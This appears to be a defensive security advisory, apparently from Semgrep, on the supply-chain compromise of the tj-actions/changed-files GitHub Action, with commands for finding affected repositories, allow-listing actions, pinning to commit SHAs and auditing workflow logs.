Popular GitHub Action tj-actions/changed-files has been compromised (GitHub issue) with a payload that appears to attempt to dump secrets, impacting thousands of CI pipelines. This isn’t the first security issue with tj-actions/changed-files—see prior vulnerability CVE-2023-51664.
What you should do
Find out where you're affected
The simplest way to find this is to grep for
tj-actionsin your codebase.If you're on GitHub, look at the results of this query, replacing YOURORG with your organization's name on GitHub:
https://github.com/search?q=org%3A<YOURORG>+uses%3A+tj-actions%2F&type=codeArguably, Semgrep is overkill for this case. But Lewis Ardern on our team wrote a Semgrep rule to find usages of tj-actions, which you can run locally (without sending code to the cloud) via:
semgrep --config r/10Uz5qo/semgrep.tj-actions-compromised. And if we find more information about what tags & commits are affected, we can update the rule over time to become more precise about whether or not you could be impacted. At time of writing, it looks like all versions are compromised.For users of Semgrep AppSec Platform, we recommend placing the detection rule in blocking mode immediately: visit the rule, click “add to policy”, and select “blocking mode.”
Stop using
tj-actions/changed-filesimmediately. Switch to a safer alternative or inline your file-change detection logic.Just removing it from the main branch of your repository won’t be enough — it could still run on other branches depending on how your actions are configured. So you need to remove it from all branches to be safe.
As an alternative, GitHub has a feature that lets you allow-list GitHub actions so you can ensure it won’t run, even if it’s still in your code.
You’ll need a list of GitHub Actions used at your org. Run this query on your codebase:
$ semgrep -e 'uses: $ACTION' -l yaml --json .github | jq -r '.results[].extra.metavars["$ACTION"].abstract_content' | grep -vE '^(actions/|docker://|[.]/[.]github/|tj-actions/)' | awk -F'@' '{print $1 "@*,"}' | sort | uniq DataDog/synthetics-ci-github-action@*, actions-rs/toolchain@*, astral-sh/setup-uv@*, aws-actions/amazon-ecr-login@*,Remove tj-actions/changed-files from the list of GitHub Actions.
Go to GitHub settings and configure like this at:
https://github.com/semgrep/semgrep-app/settings/actions
Generally, pin all GitHub Actions to specific commit SHAs (rather than version tags) you know are safe. In this case, it appears that all versions are compromised.
Audit past workflow runs for signs of compromise. Check logs for suspicious outbound network requests. Prioritize repos where your CI runner logs are public, as secrets are dumped to stdout in the payload.
Affected versions
At time of writing (2025-03-14T23:55:00Z), we assessed by inspecting tag pointers in the source repo that all versions of tj-actions/changed-files are compromised. Users may verify with git tag --points-at 0e58ed8 . See commit 0e58ed8 in https://github.com/tj-actions/changed-files.
